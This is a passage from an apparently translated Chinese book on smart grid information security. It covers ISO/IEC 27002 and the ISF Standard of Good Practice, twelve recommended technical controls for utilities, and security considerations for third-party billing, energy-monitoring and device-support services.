ISO/IEC 27031 ——信息技术——安全技术——业务连续性信息与通信 技术就绪指导 ● ISO/IEC 27032 ——信息技术——安全技术——网络安全指导 ● ISO/IEC 27033 ——信息技术——安全技术 信息技术安全 ● ISO/IEC 27034 ——信息技术——安全技术——应用安全指导 尽管大部分之前提到的已经发布的和未来将要发布的 ISO/IEC 27000 体系标 准能够帮助公用事业公司建立或发展他们的信息安全方案,但是我们还是会关注 ISO/IEC 27002。 1)ISO/IEC 27002——信息安全管理业务守则 ISO/IEC 27000 体系的第二个标准重点是提供信息安全管理指导。这个指导 主要是针对开发的,实施或是管理信息安全管理系统的。这个指导可以分为以下 12个部分: (1)风险评估 (2)安全策略 (3)信息安全机构 (4)资产管理 (5)人力资源安全 (6)物理和环境安全 (7)通信和操作管理 (8)访问控制 (9)信息系统采集、开发和维护 (10)信息安全事件管理 (11)业务连续性管理 (12)一致性 这12部分的每一个部分都包含信息安全控制和目标,]每个记录的信息安全 目标都至少有一个相应的信息安全控制。对于每个ISO/IEO 27002 信息安全控 制,都会提供一个实施指导。这个指导向机构展示了如何最好地运用信息安全控 制来支持相关信息安全目标。 使用ISO/IEC 27002 来健全和构建其信息安全方案的机构,并不需要实施标 识的所有信息安全控制。不是每一个信息安全控制都要求实施的原因有两个: ①使用 ISO/IEC 27002 的机构应该执行一个信息安全风险评估,ISO/IEC 27002的第一部分论述了这个风险评估。这个风险评估为这个机构提供了信息安 全目标的优先列表,这个列表会产生一个需要实施的信息安全控制的优先列表。 ② 实施每个信息安全控制以达到每项信息安全目标对不同大小规模的机构来 说都是不现实的。ISO/IEC 认识到了这一点,所以以ISO/IEC 27002 体系附加标 准的形式发布特定行业实施指导。金融和保险业信息安全管理指导 ISO/IEC 27015标准就是实施一个特定行业指导的例子。 为了更好地理解 ISO/IEC 27002 是如何能帮助公用事业公司发展和建立有效 的信息安全方案,我们将集中论述以上12个部分。 (1)风险评估 公用事业公司应该至少每年执行一次风险评估来识别、量化风险并对信息系 统风险排序。 一旦公用事业公司识别到风险,并且量化和排序这些风险,他们就可 以执行一些必要的操作来最小化风险,使其降到可以被各机构可接受的级别。其 中,公用事业公司必须从以下四个控制策略中选择一个: ①风险规避 风险规避策略的目标是阻止漏洞被利用。 ②风险转移 风险转移策略的目标是将风险转到其他资产、进程或机构上。 ③风险缓和——风险缓和策略的目标是最小化一个成功漏洞攻击的影响。 ④风险接受 当公用事业选择接受一个漏洞的风险及其成功攻击的影响时 会选择风险接受策略。 在使用 ISO/IEC 27002 来构建或健全一个信息安全方案以保护智能电网时, 公用事业公司应该首先选择风险规避或是风险缓和策略。大部分时候,风险规避 涉及信息安全控制的实施,这其中很多安全控制在 ISO/IEC 27002的12个部分中 都有深入介绍。 (2)安全策略 信息安全策略是成熟信息安全方案的主干部分。公用事业公司必须实施信息 安全策略来支持他们机构的业务目标,还要遵守行业标准和规范。简单地说,为了 指导和评估公用事业公司的信息安全方案,就必须具备信息安全策略。没有信息 安全策略,违反或偏离记录的信息安全策略就不能够被识别和修复。如同大多数 的信息安全做法,管理必须完全支持和参与信息安全策略的开发、发布和实施,以 确保它们能够成功。 (3)信息安全机构 与信息安全策略相似,公用事业公司的信息安全机构是成功实施一个有效的 信息安全方案的重要因素。信息安全策略也提到,管理必须支持公用事业公司的 信息安全功能,让他们更有效。这种支持应该体现在接受信息安全策略,委派信息 安全角色,包括指派清晰的角色和责任,还有周期性审核信息安全方案。 (4)资产管理 为了建立一个有效的信息安全方案,公用事业公司必须认真对待资产管理。 特别是,为了有效保护公司资产,必须将其关联到特定的拥有者,资产拥有者对系 统最终负责,包括任何要求的控制。公用事业公司不一定允许其资产拥有者授权 其他人作为资产拥有者拥有他们某些职责。资产拥有者的清晰定义使得公用事业 公司很容易确认谁对具体资产负责,并且可以审计特定资产的拥有者。如果不能 审计,公用事业公司很难实施任意一个信息安全控制。 (5)人力资源安全 可能 ISO/IEC 27002 最重要的部分之一是强调了人力在实施一个有效的安全 方案时的作用。公用事业公司必须向他们的职员、承包商和第三方阐明他们对于 信息安全的作用和责任。公用事业公司需要说明白详细的工作角色和责任、聘用 条件和对于承包商和第三方在合同中的法律条文。如果公用事业公司没有保证这 些操作,或是代表他们的人没有深刻理解他们对于公用事业公司的角色和作用,就 会严重影响其信息安全策略的成功。 (6)物理和环境安全 ISO/IEC 27002的这部分涵盖了公用事业公司必须很熟悉的话题。但是,如 阻止未授权访问、保护关键系统以及确保提供与相关风险相同保护等内容会作为 公用事业公司衡量他们现在物理和环境安全的基准。最可能需要对当前控制进行 重要评估的一个领域是智能电网设备,这些设备会部署给公用事业公司的用户。 而本节所讨论的应该只是一个开始,部署给用户的智能电网设备应该实施额外的控制,这些用户与已经识别的风险与第2章“面向消费者的安全威胁与影响”中阐 述的相同。如果不能确保智能电网的物理和环境安全,公用事业公司就是将自己 暴露在日益增加的攻击威胁中,而这些攻击威胁本来是可以防御的。 (7)通信和操作管理 ISO/IEC 27002 的资产管理部分确保公用事业公司有一个人对机构的信息系 统负责。ISO/IEC 27002的通信和操作管理部分确保公用事业公司建立有关确定 的信息系统开发、操作和持续管理的过程和程序。另外,它要求这些过程和程序能 够确保实施职责分离。实施清晰的过程和程序能让公用事业公司确保他们信息系 统操作管理的一致,同时也有助于保证信息安全控制被正确地实施与遵循。如果 没有明确的过程和程序,公用事业公司会面临操作混乱的问题。如果没有合理的 职责分离,很容易就会绕开或是最小化信息安全控制。 (8)访问控制 ISO/IEC 27002 接下来的这部分内容,即访问控制包含了如最小特权等原则。 公用事业公司应该利用该部分的信息安全控制来确保对信息系统的访问既是必要 的又是经过授权的。虽然授权是按照适当的途径来保证只有那些必须访问信息系 统的人才能访问,但是还是应该从业务和安全两个方面来评估所要求的访问。公 用事业公司可以将访问控制作为一项重要的安全手段来进一步防御信息安全。如 果没有正确实施有效的访问控制,公用事业公司会在应对不正确和未授权访问信 息系统(包括支持智能电网的系统)时呈现出很大问题。 (9)信息系统采集、开发和维护 ISO/IEC 27002的信息系统采集、开发和维护部分涵盖的内容通常称为系统 开发生命周期(System Development Life Cycle,SDLC)。公用事业公司应该利用 该部分的控制来确保在任何工程的需求阶段所有信息安全要求都包括在里面。信 息安全中的一个惯用语是“从一开始就集成了安全,花费很少,当再加入时花费就 更高”。公用事业公司可以用ISO/IEC 27002 这部分的控制来实施安全,从开始就 构建安全,在后期增强信息系统安全时节约成本。ISO/IEC 27002 这部分的控制 强调了安全需要存在于信息系统的各个方面:操作系统、网络基础设施、应用程序, 以及更多。如果公用事业公司系统开发生命周期的开发阶段没有集成信息安全要 求,将会强制他们采取被动方式来保护他们的信息系统,这种被动方式的安全会导 致公用事业公司额外的成本开销,且易于遭受原本可以避免的攻击威胁。 (10)信息安全事件管理 公用事业公司的智能电网安全现状是这样的,不是其部署会不会遭受攻击,而 是遭受攻击只是一个时间问题。为了能够防御这些攻击,从最小化影响以及阻止 未来的攻击两方面来看,公用事业公司必须实现一种能够及时识别和遏制信息安 全事件的机制。ISO/IEC 27002的信息安全事件管理部分包含的信息安全控制, 允许公用事业公司实时响应攻击,最小化攻击影响,并且实施正确的措施来预防攻 击再次发生。如果不实施这类安全控制,公用事业公司根本就不会意识到攻击,也不可能从攻击中恢复。 (11)业务连续性管理 ISO/IEC 27002的业务连续性管理,其作用是让公用事业公司能够容忍威胁 操作连续性的事件,无论这些事件是自然灾害、攻击还是事故。公用事业公司应该 利用ISO/IEC 27002第一部分生成的风险评估结果,必须识别关键基础设施及其 风险,实施信息安全控制来最小化灾害、安全违规和拒绝服务的影响。如果没有业 务连续性管理,公用事业公司将很难抵御一个协调好的,并且有目标的网络攻击。 (12)一致性 ISO/IEC27002 的最后一个部分是有关与可适用标准和法律要求的一致性。 公用事业公司可以实施ISO/IEC 27002 一致性这部分包含的信息安全控制来帮助 遵守适用的法律、规定、合同义务或是安全要求,如NERC 关键设施保护标准。在 实施这些信息安全控制时,公用事业公司应该利用他们的法律顾问来证验证他们 的一致性,并且提供整合所有适用规则和标准的建议。 一致性审计应该向公用事 业公司提供一个有关其信息安全实施以及有效性验证的外部视角。如果没有实施 ISO/IEC 27002 的一致性部分的信息安全控制,公用事业公司可能会发现自己无 法规可遵循,或是在真空中操作。 (13)信息安全论坛的良好实践标准 (SoGP) 信息安全论坛(The Information Security Forum,ISF),是一个由大量行业机 构包括金融服务、消费者产品、制造和通信[]等组成的国际协会。在2007年,信息 安全论坛公布了最新的 SoGP(Security Forum's Standard of Good Practice)的版 本(www.isfsecurity.com/SOGPO7/index.htm) 。 信息安全论坛 SoGP 向机构提 供了一系列文档记录的良好实践,实践按照该实施可以建立并维护一个有效的信 息安全计划。 注意 信息安全论坛在1989年作为一个非盈利性组织成立,它的目标是提供信息安全的观 点和指导。有超过300个成员,信息安全论坛致力于考虑信息安全挑战的多元化, 发布可用的解决方案。更多关于信息安全论坛的信息在 www.securityforum.org。 与 ISO/IEC 27000系列标准不同,信息安全论坛 SoGP 是可以免费得到的。[4] 良好的习惯做法标准按照以下6个方面组织[5]: ①安全管理 ②关键业务应用程序 ③计算机安装 ④网络 ⑤系统开发 ⑥终端用户环境 在 SoGP 中每个方面的内容都分成了很多领域和章节。一个领域涵盖了一个方面的一个特定主题,而一个章节是一个领域的子集,包含一系列声明。5每个 领域包含了一个准则和一个目标,[5]准则用于指导机构遵守良好实践标准,而目标 则解释了为什么需要其章节中的声明。将 SoGP 与 ISO/IEC 27002 相比较,可以 将良好实践标准的声明等同于27002的信息安全控制。在之前提到的 SoGP 的六 个方面总共有36个领域和166个章节。 为了能够最好的理解 SoGP 是如何帮助公用事业公司发展或是建立有效的信 息安全策略,我们集中分别论述以上的六个方面。 2)安全管理 SoGP 安全管理方面由7个领域和36个章节组成。5]这7个领域和36个章节 致力于在机构中建立一个有效的信息安全管理功能。为了让公用事业公司实施一 个有效的信息安全管理功能,他们必须凭借管理以及资源上的支持来保证上层管 理支持的安全。如果公用事业公司没有一个有效的信息安全管理功能,他们只能 去努力实现一些必要的过程、程序和技术来保护智能电网。 3)关键业务应用程序 SoGP 接下来是关键业务应用,包括6个领域和25个章节。SoGP 这个方面 的目标是去识别对于机构重要的应用程序,进而识别和管理它们的风险。公用事 业公司必须实施一个风险识别和管理的过程来有效并且高效地管理它们的关键基 础设施。如果没有一个有效且高效的风险识别和管理过程,公用事业公司将可能 忽略关键业务应用程序潜在的风险或是不合理地分配有限的资源给错误的关键业 务应用程序。 4)计算机安装 SoGP 的计算机安装方面包含6个领域和31个章节。计算机安装意在确保 机构明白其关键业务应用运行的信息系统必须要安全。为了能够正确识别支持关 键业务应用的信息系统的需求,以及随后能实施恰当的控制来保护该信息系统,公 用事业公司必须满足 SoGP 在计算机安装方面的目标。如果没有识别关键业务应 用的信息系统需求或者没有实施合理控制进行保护,那么公用事业公司可能就会 因为一些不必要的服务或错误配置而给智能电网带来额外的风险。 5)网络 SoGP 的第四个方面标准涉及网络,包含5个领域和25个章节。[5]网络方面与 之前提到的计算机安装方面非常相似。特别是,网络方面的目的是确保机构理解 支持他们关键业务应用程序的网络基础设施。这个网络基础设施必须被合理保护 以防止攻击和干扰。公用事业公司必须达到 SoGP 在网络方面的目标,这个目标 阐述了支持关键业务应用程序的网络设计、管理、运行和维护。如果没有达到网络 方面的目标,公用事业公司的智能电网将容易受到原本可阻止的干扰和滥用。 6)系统开发 SoGP 的系统开发方面由6个领域和23个章节组成。系统开发意在将信息 安全要求和控制整合到 SDLC 中。为了开发更安全的系统,并且能在系统部署到产品之后与实施信息安全控制相比节省成本,公用事业公司必须达到 SoGP 系统 开发的目标。如果公用事业公司的 SDLC 没有包含识别信息安全要求或是信息安 全控制,则自身易于遭受原本可以阻止的攻击,并且增加保护智能电网安全的 成本。 7)终端用户环境 SoGP 的最后一个方面是终端用户环境。这个方面包含了6个领域和26个章 节,意在确保机构以一种可接受的方式来安排终端用户的培训,使其使用机构的信 息系统。[公用事业公司必须达到 SoGP 终端用户环境目标,来确保无论他们使用 什么应用程序或是通过什么媒介访问信息,公用事业公司的职员都能保护他们的 敏感信息。如果没有实现终端用户环境方面的要求,则公用事业公司就是默许不 当访问、传播敏感信息。因为不可能保证终端用户总是正确的访问信息系统和数 据,所以终端用户环境的目的是向公用事业公司提供一种最小化滥用频率的强有 力方法。 8.2 排名前12的智能电网安全技术规范 现在我们已经了解了信息安全的脆弱面以及如何帮助公用事业公司发展和 建立一个有效的信息安全方案,接着我们将从技术上讨论公用事业公司保护智 能电网的最佳方式。这些技术适用于公用事业公司的企业环境和智能电网 部署。 下面列出的排名前12的技术规范不是按照其重要性排列的,公用事业公司应 该审查整个列表然后再确定哪种规范与其要保护的资产的风险管理控制是匹配 的。这个列表并没有包括所有规范,而且也不是论述的所有规范都适用于所有的 公用事业公司以及智能电网部署。 以下是排名前12的技术规范: (1)威胁建模 (2)隔离 (3)默认拒绝防火墙规则 (4)代码命令签名 (5)蜜罐 (6)加密 (7)脆弱性管理 (8)渗透测试 (9)源代码审查 (10)配置加强 (11)强认证 (12)日志和监控 8.2.1 威胁建模 威胁建模主要是为了让方案设计师、开发者或者软件能够识别其部署存在的 潜在攻击途径。设计者和开发者通常最了解解决方案或软件的功能,这也是为什 么认为他们最适合执行威胁建模的原因。然而,信息安全专家必须努力为设计者 和开发者提供必需的培训。设计者和开发者总是更关注于功能,只是大致考虑一 下常规使用,即开发使用用例或者用户案例。使用用例和用户案例一般定义了一 个真实用户如何正确使用软件解决问题,这个通常被称为功能需求。但是,威胁模 型主要是研究这个方法或是软件如何能被恶意滥用。信息安全专家通过培训设计 者和开发者,让他们像攻击者一样思考,考虑其解决方案或软件的恶意使用。要想 让设计者或开发者转变为从恶意使用角度来考虑,使用他们熟悉的相似的术语可 以促进这个过程的转变,培训他们在开发使用用例或用户案例的同时,也应该开发 恶意用例或者案例。 一旦识别了攻击途径,就能实施信息安全控制来缓和攻击。攻击可以分成机密性 攻击、完整性攻击和部署可用性攻击。以下是智能电表软件的威胁建模的一个例子。 ● 使用用例——公用事业公司维修人员通过无线网络向智能电表远程认证 以更新其固件。 ● 滥用用例 攻击者能拦截智能电表通过无线通信发到公用事业公司的 凭证。 所以,软件开发者可以使用加密来使混淆凭证,使其对于攻击者无用。 譬告 用例对应滥用用例或者用户案例对应恶意案例,其实并不总是一对一的。对于一 个使用用例可以有很多滥用用例,考虑每个使用用例的滥用用例时应该要花费一 定的时间。 威胁建模已经成为许多机构开发生命周期的完整部分。微软将威胁建模整合 到安全开发生命周期中。[6]更多关于威胁建模的信息和微软专门的方法在 http:// blogs/msdn.com/sdl。 8.2.2 隔 离 支付卡行业数据安全标准(PCI DSS)强烈建议那些遵守标准的机构将其持卡 人数据环境与其余的网络隔离,以限定标准要求的范围。 这个概念也适用于公用 事业公司和智能电网。但是,公用事业公司和智能电网隔离的目标不应该是限制 标准要求的范围,而应该是最小化攻击影响。例如,如果公用事业公司通过地理位 置来隔离其智能电表部署,禁止不同位置之间的通信,那么蠕虫病毒只能存在于其 最初进入的位置不能扩散。隔离应该使用状态防火墙来实施,不能使用交换机或 路由器访问控制列表(ACLs) 实施。 8.2.3 默认拒绝防火墙规则 尽管很多机构对外实施默认拒绝防火墙规则是司空见惯的,但是在其内部确 不是这样的。公用事业公司应该在他们的防火墙上对所有的内部和外部访问都实 施默认拒绝规则,外部连接只有在系统必须直接访问Internet 时才允许,所有其他 系统应该强制使用代理来提供如内容过滤、SSL 终端或是恶意软件检测等保护。 实施一个代理服务器和默认拒绝对外防火墙规则会大幅度减少用远程命令和控制 服务器通信损害公用事业公司内部资产的可能性。 8.2.4 代码和命令签名 智能电网设备(例如智能电表)的软件开发者必须对他们的代码以及接收或发 送智能电表数据的关键命令实施签名。代码签名利用了哈希加密来验证软件的作 者以及准备运行的代码的完整性。命令加密提供了相同的作者身份以及命令的完 整性验证。如果没有实施代码和命令的签名,攻击者就能够在智能电表上执行他 们自己任意的代码以及发布智能电网基础设施信任的命令。代码和命令签名曾经 阻止了IOActive 的 MikeDavis 在他的智能电表安全研究中成功开发的蠕虫。[ Davis 说“我们发现的许多安全漏洞十分可怕,并且大多数智能电表并没有使用加 密或是在执行如运行软件更新以及电网服务用户等敏感功能之前要求认证。”更多 关于 Mike Davis 的研究的信息在 www.ioactive.com/news-events/DavisSmart- GridBlackHatPR.html。 8.2.5 蜜 罐 蜜罐用于识别和跟踪攻击者,对于有漏洞的系统而言蜜罐就像是一个实际的 系统,但实际上他们都是虚拟的,与实际环境是隔离的。蜜罐之所以能用来识别攻击者是因为他们能配置成当被攻击或者成功攻破时发出警报。蜜罐能用来跟踪攻 击者,就是通过向攻击者展现一些错误的信息,而这些信息也能设置成一旦被访问 就发出警报。通过这样做,系统就能明白它们现在的威胁以及攻击者在其基础设 施中查找漏洞所使用的方法。最后,在攻击者攻破蜜罐进入实际系统之前,蜜罐还 能用于用于制定对抗的攻击者的对策。蜜罐工程是一个强大的资源供学习更多关 于蜜罐以及部署蜜罐的知识。蜜罐工程的网站是 www.honeynet.org。 8.2.6 加 密 公用事业公司必须实施加密来保护数据,防止数据受到损害或是内部威胁。 实施加密最明显的地方包括传输敏感信息(例如用户数据)的传输层,但还应该实 施在数据库、整个磁盘和可移动媒介。存储在公用事业公司数据库中的敏感信息 应该通过强加密标准例如AES 加密,这样有助于在遭受攻击或面临内部威胁时阻 止对公用事业公司的数据库数据的未授权访问。将加密扩展到工作站、笔记本电 脑甚至是可移动媒介的整个磁盘,同样有助于在失窃或者遗落在其他地方时阻止 对公用事业公司敏感数据的未授权访问。 8.2.7 漏洞管理 公用事业公司必须实施控制来确保正确地管理他们环境中存在的漏洞。 一个 漏洞管理方案可以让公用事业公司确定其补丁、配置策略、过程及程序在哪儿是有 效的,在哪儿是无效的。漏洞扫描,作为漏洞管理方案的一部分,会识别公用事业 公司资产的漏洞,并且提供给他们有价值的能够用来处理威胁的信息。通过了解 在他们环境中漏洞存在的位置,公用事业公司就能进行有效的基于风险的方法来 管理他们的漏洞。如果没有一个漏洞管理方案,公用事业公司以及智能电网将无 法处理经常性的威胁和攻击。 8.2.8 渗透性测试 信息安全最常见的容易被人误解的技术之一是渗透性测试。许多人搞混渗透 性测试和漏洞扫描还有漏洞评估。但是,渗透性测试与漏洞扫描、漏洞评估不同, 它试图去确认已经识别的漏洞的风险。漏洞扫描和漏洞评估只是去识别、量化和 在测试环境中给漏洞排序。渗透性测试利用被识别的漏洞以及其他合适的控制, 会验证由其他两种技术识别的风险。公用事业公司应该针对他们所有的环境执行 常规的渗透性测试,并且经常对包含敏感信息或是关键基础设施的环境进行测试。 许多机构每年执行一次渗透性测试,但是由于公用事业公司和智能电网面临的威 胁是不断变化的,这本书的作者相信渗透性测试应该在之前提到的环境中至少每 个季度执行一次。理想情况下,公用事业公司会雇佣或是聘请渗透性测试专家长 期的对他们的关键环境进行评定。 工具 Metasploit Framework 是一个能用来对网络设备、信息系统和 Web 应用程序进行 渗透性测试的开源测试工具。最初由 HD Moore 开发,在2009年10月7号被漏 洞管理公司 Rapid7 购买,Metasploit 提供了一个替代商业渗透性测试工具例如 Core Security (www. coresecurity.com/) 的 Core impact 和 ImmuitySec (www.immunitysec.com/) 的 CANVAS 的免费工具。10] 2010年4月,Rapid7 公布了 Metasploit Express 的商业版 Metasploit 。 不过, Moore 和 Rapid7 会继续提供他们 一 直维护的 Metasploit 免费版[]。访问 www.metasploit.com 可以了解更多关于 Metasploit 的信息并下载渗透性测试 工具。 8.2.9 源代码审查 作为成熟的软件开发生命周期的一部分,机构应该审查源代码来查找漏洞。 漏洞扫描是在漏洞进入环境时识别漏洞的,而源代码审查的目的是在软件发布之 前识别软件中的漏洞。公用事业公司必须对由其内部以及供应商开发的、在环境 中使用的并且涉及敏感信息或关键基础设施的软件实施源代码审查。与在实际生 产系统中修补漏洞代码相比,在软件开发阶段就投资源代码审查,公用事业公司实 质上是节省了成本,而且还能防止将漏洞引入到他们的环境中。 8.2.10 配置加固 相似的方式应该在系统投入使用之前加固系统。可以的话,应该使用加固后 的系统映像来建立系统,而不是尝试去从他们的供应商提供的基础设置中加固系 统。应该经常在加固过的系统映像上执行漏洞扫描和渗透性测试。 已经建立了一些标准来加固普通的操作系统,并且智能电网中大部分的系统 会运行一个这样加固过的系统。互联网安全中心(CIS,http://cisecurity.org), 它 提供了大量设备、应用程序和操作系统的基准。公共事业公司应该利用这些标准 来保证系统只要进入使用就是安全的。 8.2.11 强认证 强认证要求至少要实施三种认证方式中的两种来授权对特定资源的访问。这 三种认证方式如下: ● 我知道一些事情 例如:密码 ● 我具有一些东西——例如:智能卡 ● 我是谁——例如:指纹 强认证意图当两种认证方式中的一种被攻破时阻止对资产的未授权访问。例 如,如果一个公用事业公司实施了强认证,要求有密码和智能卡来远程登录公司网络,那么智能卡丢失或是恶意用户得到了密码也不能威胁公用事业公司的安全。 公用事业公司应该实施强认证来保护包含敏感信息和关键基础设施的所有环境。 强认证也应该扩展到这些环境的资产管理行为,而不是简单地只认证用户一次。 8.2.12 日志和监控 日志和监控意图提供信息用以识别攻击以及在安全事件发生时重构事件。例 如,有关试图访问公用事业公司网站不成功认证的日志和监控表明攻击者正在尝 试攻破一个用户的账户。相似地,如果一个攻击者能够成功登陆一个用户的账户、 日志和监控可以用来查看攻击者执行了哪些行为。公用事业公司应该对环境中包 含敏感信息和关键基础设施的所有设备实施日志和监控。日志和监控应该扩展到 应用程序、操作系统和网络级别,包括实施和使用入侵检测和入侵防御系统。如果 没有日志和监控,公用事业公司在其环境和智能电网遭受攻击以及攻击以后根本 就无计可施。 8.3 总结 建立和发展一个信息安全方案是公用事业公司和智能电网的基础。建立和发 展一个信息安全方案的过程不能按照一个特定的模式来实施,也不能不按照标准 来实施。使用国际认证的标准,例如SoGF 的 ISO/IEC 27000 体系标准,可以确保 一个有效的信息安全方案中的最关键部分都包含了。 使用基于标准的方法来建立和发展公用事业公司信息安全方案是最基础的, 还需要使用一些技术规范来支持。如果没有这些技术,则任何信息安全方案中的 策略、过程和程序对公用事业公司和智能电网的安全态势的影响都很小。 第三方服务 9.1 服务提供商 缩减成本、增加功能是吸引公用事业公司使用第三方服务的目标。有很多不 同的可用第三方服务,这一章会用三个例子来说明整合第三方服务的安全准则: ● 计费 ● 消费者界面 ● 设备支持 9.1.1 计 费 用户计费操作或其中的部分操作可以外包给一个专门处理计费的公司。外包 计费对安全的影响取决于外包的计费操作的量。通常的方法是使用第三方如 PayPal(www.paypal.com) 和 BillMatrix(www.billmatrix.com) 来储存、传输和 处理支付卡数据。 1)一致性 使用第三方支付网关的一个潜在好处是消费者可以选择使用信用卡或是借记 卡,不需要考虑要遵守支付卡行业数据安全标准(PCI DSS) 。PCI DSS 是加强支 付账户数据安全的一系列要求,由包括美国运通卡、发现金融服务、万事达和 Visa 的信用卡公司建立的。2] 警告 使用第三方看起来很轻松,避免了保证消费者支付卡安全的责任。但是,消费者的 信息如果在第三方处理支付中丢失,消费者最终会把责任归到公用事业公司上。 确保第三方遵守 PCIDSS 应该是第三方必须满足的最低要求。评估第三方整体的 安全态势对于最小化公司承担的风险至关重要。 2)第三方支付处理程序所需的访问 图9.1的例子说明了第三方存储、传输和处理支付卡数据流程。公用事业公司不需要访问支付卡数据,并且也不需要访问第三 方的内部网络。如果公用事业公司要访问数据,他们需要满足与 PCI DSS的一 致性。 另外,第三方为了确保正确的账号支付也仅只需要访问消费者数据而已。第 三方不需要知道消费者能源的使用情况、支付历史,甚至或是余额信息。最重要的 是,第三方不需要访问公用事业公司的内部网络。但是,这个例子是假设第三方只 处理用户支付。如果假设第三方还有其他作用如核算,则所需访问权限的级别就 会增加。 9.1.2 消费者界面 为了向消费者提供智能电网承诺的服务,公用事业公司会在消费者的家里和 公司中实施新的技术。尽管公用事业公司能建立和管理自己的产品,但是已经有 大量的技术公司提供这些技术,并且这些公司具有可行的解决方案。 1)查看能源消耗 我们考虑将能源消耗应用程序作为第三方服务的一个例子。公用事业公司可 以与知名的服务提供商,例如Google 或是微软合作,而非他们自己开发 Web 应用 程序。Google 和微软已经开发了名为 PowerMeter(www.google.com/powerme- ter) 和 Hohm(www.microsofthhohm.com) 的能源消耗的 Web 应用程序,允许用 户监测他们的能源消耗,并且提供减少能源使用的建议。这些应用程序收集了直 接从公用事业公司或是间接从智能设备得到的能源使用数据,并将这些数据用友 好界面的方式呈现。图9.2说明了从公用事业公司到第三方的数据流。 (1)能源消耗应用程序服务提供商所需的访问 所以这个问题接下来就变成,Google 和微软需要访问什么样的数据,他们需 要直接访问公用事业公司的网络获取这些数据吗? Google 已经发布了一个应用 程序编程接口(API) 来提供一种简便方法上传使用统计信息到他们的 PowerMe- ter 应用程序中,[3]相似地,微软也为 Hohm 开发了SDK。[4]所以如果公用事业公 司与 Google 合作,公用事业公司要周期性地(例如,每30min) 向 Google 发送数 据。这些数据是以经过HTTP POST3协议加密的 XML 文件形式传输到 Google 服务器中。这个过程表明了Google 并不需要访问公用事业公司内部网络的资源 从而最小化公用事业公司的风险。另外,数据在传送到 Google 服务器时是经过加 密的。所以,数据被损害的风险是最小的,至少现在还没有。这章之后的“攻击消 费者”部分,会阐述针对 Google 和微软服务威胁其使用数据的攻击。 从消费者的角度来看,如果他们的公用事业公司还没有与第三方合作,那么就 是有其他选择。例如能源侦探(www.theenergydetective.com) 公司就已经开发了 可以与Google PowerMeter 直接交互的设备。这些设备通常连接到消费者的家庭 或是公司网络,使用消费者的 Internet 连接来传输数据到Google 。所以,公用事业 公司已经完全脱离出来,将由消费者、Google (其他提供类似服务的第三方),以及 开发这样设备的公司承担风险。 2)管理智能设备 与管理允许消费者远程控制智能设备的第三方服务的风险相比,管理报告能源使用的风险就是较小的了。从改变恒温器的温度到开、关燃气壁炉,这些服务都 要求网络访问智能设备。命令控制采用的网络路径决定该场景中所涉及的每个实 体的风险。 (1)智能设备控制所需的访问 智能设备管理界面需要与第三方支付处理服务或是能源使用报告服务完全不 同的访问级别。如果你在公用事业公司工作,并且被要求对提供解决方案的第三 方进行评估, 一个要考虑的很重要的问题是:这个第三方需要使用你们的工作网络 访问智能设备吗?图9.3描述了这个情况,并且显示了新增的对公用事业公司和 第三方网络的访问。或者,第三方向消费者提供了可以通过使用消费者的 Internet 连接来与第三方直接通信的网关了吗?从公用事业公司的角度来看,要求第三方 与消费者直接通信似乎风险最小。但是,这样会要求消费者在他们的网络上安装 另一个设备,从而增加他们的风险,消费者可能不会接受。 注意 你理解了这一章的思想吗?应该尽可能地限制访问数据和网络资源。如果第三方 没有一个访问特定资源的有效业务理由,就不会允许其访问这个资源。本质上,这 就意味着需要应用一个很简单的理论概念,最小权限原则。你如何应对第三方要 求具有管理员账户来提供服务则是一个不同的问题。 9.1.3 设备支持 当公用事业公司选择提供商以购买设备(例如智能电表)时,他们通常也就选 择了购买维护服务。虽然预计智能电表一般只有15年到20年的使用寿命,但还 是期望其功能是在持续不断发展的。另外,这些设备、补丁以及新的固件中会识别 到安全漏洞,这些安全漏洞需要从这些设备中排除。幸运的是,至少从方便使用的 角度,大多数的智能电表能够远程更新这些固件。 1)远程管理设备所需访问 应用补丁或是新的固件最有可能是通过公用事业公司工作网络运行。尽管连 接智能电表到消费者网络,并且直接与第三方服务提供商通信是可能的,但是这个 方法最可能只是个例外而不是规范。如果服务提供商负责管理补丁或是新的固 件,他们就会需要一个从公司网络到公用事业公司工作网络的网络路径。这些服 务商最有可能使用现有的文件传输协议,例如文件传输协议(FTP) 或是简单文件 传输协议(TFTP), 来上传新的固件或是补丁到设备。安全专家希望使用更安全 的协议,例如安全文件传输协议(SFTP) 或是安全拷贝协议(SCP), 但是事实是最 有可能使用的是未加密的协议。依靠第三方,他们可能需要在工作网络中安置一 个补丁管理系统。这个补丁管理系统会从第三方网络捕获安全补丁或是新的固 件,然后将这些安全补丁或是固件装进设备中。所以,公用事业公司需要允许一个第三方服务器运行在公用事业公司网络中,并且允许服务器访问网络。 9.2 攻击消费者 随着智能电网第三方服务的应用及进一步发展,针对电力消费者的攻击将会变得 更加容易。毋庸置疑,最难修复的漏洞通常都是针对使用者的。由于针对使用者的攻 击对机构的威胁并不那么明显,所以这些漏洞也在慢慢变成“可接受的风险”。 9.2.1 功能削弱安全 信息安全专家经常被指责干扰业务操作,警告一些可能被未知恶意个体,即媒 体和大众所称呼的“黑客”,滥用的未保护的功能以及额外的功能。然而,事实上, 在智能电网设备中是一些必要的功能给相关系统、电力设备如灯、恒温器、冷冻机 等的机密性和完整性带来更大的风险。在智能电网中,智能电网设备、公用事业公 司应用程序和服务,以及第三方服务的功能都是在发展和增强的。 9.2.2 微 软 Hohm 与 Google PowerMeter 在写这本书的时候,最引人注目的第三方服务如微软 Hohm 和 Google Pow- erMeter, 由于其只是收集和统计电力使用数据,并不提供操纵电力供应和设备的 功能,所以其功能很有限。这个局限性限制了能用来攻击消费者的攻击类型以及 成功攻击的潜在影响。尤其是,攻击者要实施攻击的话,将不得不访问用户的数 据,然后实施物理攻击获取用户属性——没有人在家时就想到抢劫。因为基本上 只有只读的功能,攻击者不能很容易的造成第3章“面向公用事业公司的安全威胁 与影响”描述的那种远程的、自动和广泛的破坏性攻击。 可以预料,消费者可用的功能越多,就会有越多针对消费者的危险攻击。当用 户能远程关闭电力设备,攻击者也许就能够通过远程关闭所有电力设备来执行拒 绝服务攻击。当用户能远程管理他们的家庭网络(HAN) 时,攻击者可能就能够远 程利用HAN 攻击公用事业公司或是其他目标。随着功能的发展与强大,攻击的 可能性也变得越来越大。以下的章节论述了第三方应用程序例如微软的 Hohm 和 Google 的 PowerMeter 的具体方面。 1)单点登录 单点登录是信息安全行业中双刃剑的最好例子之一。一方面,如果没有单点 登录,用户会被要求记住多个账户凭证。这样的目的是,用户可以忽略数据库应用 程序的密码或是只记住最常用的,不用费心学习如何使用。最后的结果通常是,很 